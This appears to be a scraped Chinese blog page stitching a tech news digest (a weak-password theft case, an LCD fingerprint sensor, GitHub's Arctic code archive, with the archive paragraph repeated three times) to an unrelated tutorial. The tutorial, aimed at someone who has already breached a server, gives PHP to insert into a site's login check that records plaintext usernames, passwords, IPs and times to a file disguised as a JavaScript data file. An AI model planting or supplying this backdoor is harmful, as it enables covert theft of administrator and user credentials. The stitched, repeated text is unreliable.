解决方案:黑客利用公司后台弱密码转走730万；全球首款 LCD 屏内多点指纹识别方案发布；

　　解决方案:黑客利用公司后台弱密码转走730万；全球首款 LCD 屏内多点指纹识别方案发布；

　　近日，由深蓝科技研发的“熊猫智能公交”首次在上海开放道路上进行测试。它是一款纯电动新能源汽车，外形酷似一只大熊猫。内部配备售货柜，支持“刷手”支付。支付方式采用手脉识别生物技术，通过红外线拍摄采集皮肤下3毫米的内部生命体特征，再通过精密算法，匹配识别体内独特DNA的生物特征值掌上支付，完成身份认证，自动绑定支付软件，轻松支付。

　　1个

　　黑客利用公司后台弱密码转账730万

　　近日，上海某公司自主研发的“支付系统”被黑，涉案金额高达730万元。*敏*感*词*经调查发*敏*感*词*划转权限后，他立即向公司7个银行账户发出汇款指令，进行盗款。公司造成巨额经济损失的根本原因是其后台使用了“123456”，世界上最容易破解的弱密码之一。此外，该公司为降低转会费自建“支付系统”，未能在网站*敏*感*词*上线后30日内完成报告，并进行等级保护评估，导致在管理后台处于“裸奔”状态。黑客有更多可乘之机。

　　目前，上海*敏*感*词*根据银行账户记录和资金流向，在14天内*敏*感*词*了来自全国各地的15名*敏*感*词*嫌疑人。可见很多人的密码安全意识还是不强。事实上，强密码是保护网络信息安全最基本、最核心的手段之一。

　　咸鱼要站出来：你还在用容易破解的弱密码吗？

　　2个

　　全球首款液晶屏多点指纹识别发布

　　昨日，天马微电子宣布，其研发的全球首款液晶屏多点指纹解决方案（TFP）正式发布。拥有自主知识产权，具有高集成度、全面屏多点指纹识别、高屏占比等特点。. 此次屏幕采用光学指纹识别方式，将光路调制单元和指纹图像采集器集成到显示屏中，相比外置显示屏厚度减少50%以上准直光路设计方案，让手机变得更轻薄，屏占比也得到了提升。同时，全面屏指纹多点识别方案还首次实现触控、显示、指纹识别三大功能的融合，可应用于全面屏盲解锁、App加密解锁、自定义指纹控制等。这意味着智能终端的人机交互体验将更加多元化。可实现应用锁和全屏指纹识别的结合，点击图标时同时验证指纹，一键解锁，有助于提高手机的安全性和隐私性。甚至可以在点击立即支付的瞬间自动完成指纹验证，大大简化了操作。目前，天马'

　　咸鱼想转身：触控、显示、指纹识别三合一，有点厉害，会给交互体验带来很大改变。

　　3个

　　GitHub 的终极罗曼史：开源代码永存

　　人类文明的成果是最宝贵的财富。无论是为了未来的人类了解过去的历史，还是为了结束之后的重启，都应该妥善保存，传承给后代。为了让开源代码长期安全无虞，GitHub 实施了浪漫的人类计划。7月8日，GitHub将支持当今社会运行的几乎所有开源代码，包括Net、ruby、apache、docker、php等，以及涵盖操作系统、数据库、金融区块链、音频等几乎所有开源代码和视频，前端和后端等。程序明智，存储在 201 胶卷中，打包并运往斯瓦尔巴群岛。斯瓦尔巴群岛位于世界最北端，气候极其寒冷，终年冰封。它是远离世界纷争、保存人类文明的圣地。这些薄膜被放置在钢制容器中，并密封在一个保持-5°C恒温的极度干燥的废弃煤矿中，预计可以保存长达一千年。同时，GitHub 也在研究使用石英玻璃作为存储代码的介质。对电磁干扰、水和热具有良好的适应性，可提供数万年的储存寿命。目前，GitHub 已经以这种形式存储了全球最流行的 6000 个项目代码，以验证其可行性。预计可以持续一千年。同时，GitHub 也在研究使用石英玻璃作为存储代码的介质。对电磁干扰、水和热具有良好的适应性，可提供数万年的储存寿命。目前，GitHub 已经以这种形式存储了全球最流行的 6000 个项目代码，以验证其可行性。预计可以持续一千年。同时，GitHub 也在研究使用石英玻璃作为存储代码的介质。对电磁干扰、水和热具有良好的适应性，可提供数万年的储存寿命。目前，GitHub 已经以这种形式存储了全球最流行的 6000 个项目代码，以验证其可行性。

　　咸鱼要站出来：如果你的代码存入源码，你将获得Github勋章~有人收到了吗？

　　秘密:社工利器后台密码截获方法

　　为什么80%的码农不能成为架构师？>>>

　　当我们用不正常的方法拿下一个服务器或者服务器中的一个站点时，这时候可能不是我们的最终目的。为了得到管理员的明文密码但是被md5困住了，所以我们可以用这个方法来拦截管理员密码

　　在我们需要拦截的网站后台加入：

　　将其添加到普通程序判断用户密码的网站中

　　$ip=$_SERVER['REMOTE_ADDR']; //获取ip

$showtime=date("Y-m-d H:i:s"); //获取日期

$cururl=GetCurUrl();(自己写获取登入路径的函数) //获取登入页面

$record="Username:".$userid." Password:".$pwd." Url:".$cururl." IP:".$ip." Time:".$showtime." \r\n";// 组成成字符串集 里面变量自己更改

<p>

$handle=fopen(&#39;../include/data/ipdata.js&#39;,&#39;a+&#39;); fopen以读写创建打开文件

$write=fwrite($handle,$record); //fwrite函数把刚才的字符串写进文件保存

function getCurUrl() {

if (! empty ( $_SERVER [\"REQUEST_URI\"] )) {

$scriptName = $_SERVER [\"REQUEST_URI\"];

$nowurl = $scriptName;

} else {

$scriptName = $_SERVER [\"PHP_SELF\"];

if (empty ( $_SERVER [\"QUERY_STRING\"] )) {

$nowurl = $scriptName;

} else {

$nowurl = $scriptName . \"?\" . $_SERVER [\"QUERY_STRING\"];

}

}

return $nowurl;

} 自定义获取当前脚本所在url</p>

　　转载于：